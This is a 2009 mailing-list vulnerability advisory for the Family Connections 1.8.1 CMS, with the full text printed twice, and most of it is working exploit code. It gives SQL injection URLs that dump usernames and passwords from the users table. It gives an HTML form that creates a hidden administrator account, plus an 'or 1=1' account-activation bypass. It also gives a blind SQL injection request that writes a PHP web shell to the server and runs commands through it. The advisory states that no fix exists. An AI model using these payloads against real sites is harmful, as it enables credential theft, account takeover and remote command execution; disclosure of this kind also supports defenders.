<<< Date Index >>>     <<< Thread Index >>>

Family Connections 1.8.1 Multiple Remote Vulnerabilities



*******   Salvatore "drosophila" Fresta   *******

[+] Application: Family Connection
[+] Version: 1.8.1
[+] Website: http://www.familycms.com

[+] Bugs: [A] Multiple SQL Injection
          [B] Create Admin User
          [C] Blind SQL Injection       

[+] Exploitation: Remote
[+] Date: 25 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = on/off

These bugs allows a registered user to view
username and password of all registered users.


- [B] Create Admin User

[-] Requisites: magic_quotes_gpc = off
[-] File affected: register.php, activate.php

This bug allow a guest to create an account with
administrator privileges.


- [C] Blind SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: lostpw.php


*************************************************

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL
SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23

http://www.site.com/path/recipes.php?category=1&id=1 UNION SELECT
1,2,username,password,5,6 FROM fcms_users

http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT
1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23


- [B] Create Admin User

<html>
  <head>
    <title>Family Connection 1.8.1 Create Admin User Exploit</title>
  </head>
  <body>
    <p>This exploit creates an user with administrator privileges
using follows information:<br>
       Username: root<br>
       Password: toor<br>
    <form action="http://localhost/fcms/register.php"; method="POST">
      <input type="hidden" name="username" value="blabla">
      <input type="hidden" name="password" value="blabla">
      <input type="hidden" name="email" value="blabla@xxxxxxxxxxxxx">
      <input type="hidden" name="fname" value="blabla">
      <input type="hidden" name="lname" value="blabla">
      <input type="hidden" name="year"
value="00-00-000','fakeuser','fakepassword'), (1, NOW(), 'root',
'root', 'root@xxxxxxxxx', '00-00-00', 'root',
'7b24afc8bc80e548d66c4e7ff72171c5')#'">
      <input type="submit" name="submit" value="Exploit">
    </form>
  </body>
</html>

To activate accounts:

http://www.site.com/path/activate.php?uid=1 or 1=1&code=


[C] Blind SQL Injection

POST /path/lostpw.php HTTP/1.1\r\n"
Host: www.site.com\r\n"
Content-Type: application/x-www-form-urlencoded\r\n"
Content-Length: 193\r\n\r\n"
email=-1' UNION ALL SELECT '<?php echo "<pre>"; system($_GET[cmd]);
echo "</pre><br><br>";?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
INTO OUTFILE '/var/www/htdocs/path/rce.php'#

To execute commands:

http://www.site.com/path/rce.php?cmd=ls


*************************************************

[+] Fix

No fix.


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351
*******   Salvatore "drosophila" Fresta   *******

[+] Application: Family Connection
[+] Version: 1.8.1
[+] Website: http://www.familycms.com

[+] Bugs: [A] Multiple SQL Injection
          [B] Create Admin User
          [C] Blind SQL Injection       

[+] Exploitation: Remote
[+] Date: 25 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = on/off

These bugs allows a registered user to view
username and password of all registered users.


- [B] Create Admin User

[-] Requisites: magic_quotes_gpc = off
[-] File affected: register.php, activate.php

This bug allow a guest to create an account with
administrator privileges.


- [C] Blind SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: lostpw.php


*************************************************

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL SELECT 
1,2,NULL,username,5,password,email FROM fcms_users%23

http://www.site.com/path/recipes.php?category=1&id=1 UNION SELECT 
1,2,username,password,5,6 FROM fcms_users

http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT 
1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23


- [B] Create Admin User

<html>
  <head>
    <title>Family Connection 1.8.1 Create Admin User Exploit</title>
  </head>
  <body>
    <p>This exploit creates an user with administrator privileges using follows 
information:<br>
       Username: root<br>
       Password: toor<br>
    <form action="http://localhost/fcms/register.php"; method="POST">
      <input type="hidden" name="username" value="blabla">
      <input type="hidden" name="password" value="blabla">
      <input type="hidden" name="email" value="blabla@xxxxxxxxxxxxx">
      <input type="hidden" name="fname" value="blabla">
      <input type="hidden" name="lname" value="blabla">
      <input type="hidden" name="year" 
value="00-00-000','fakeuser','fakepassword'), (1, NOW(), 'root', 'root', 
'root@xxxxxxxxx', '00-00-00', 'root', '7b24afc8bc80e548d66c4e7ff72171c5')#'">
      <input type="submit" name="submit" value="Exploit">
    </form>
  </body>
</html>

To activate accounts:

http://www.site.com/path/activate.php?uid=1 or 1=1&code=


[C] Blind SQL Injection

POST /path/lostpw.php HTTP/1.1\r\n"
Host: www.site.com\r\n"
Content-Type: application/x-www-form-urlencoded\r\n"
Content-Length: 193\r\n\r\n"
email=-1' UNION ALL SELECT '<?php echo "<pre>"; system($_GET[cmd]); echo 
"</pre><br><br>";?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE 
'/var/www/htdocs/path/rce.php'#

To execute commands:

http://www.site.com/path/rce.php?cmd=ls


*************************************************

[+] Fix

No fix.


*************************************************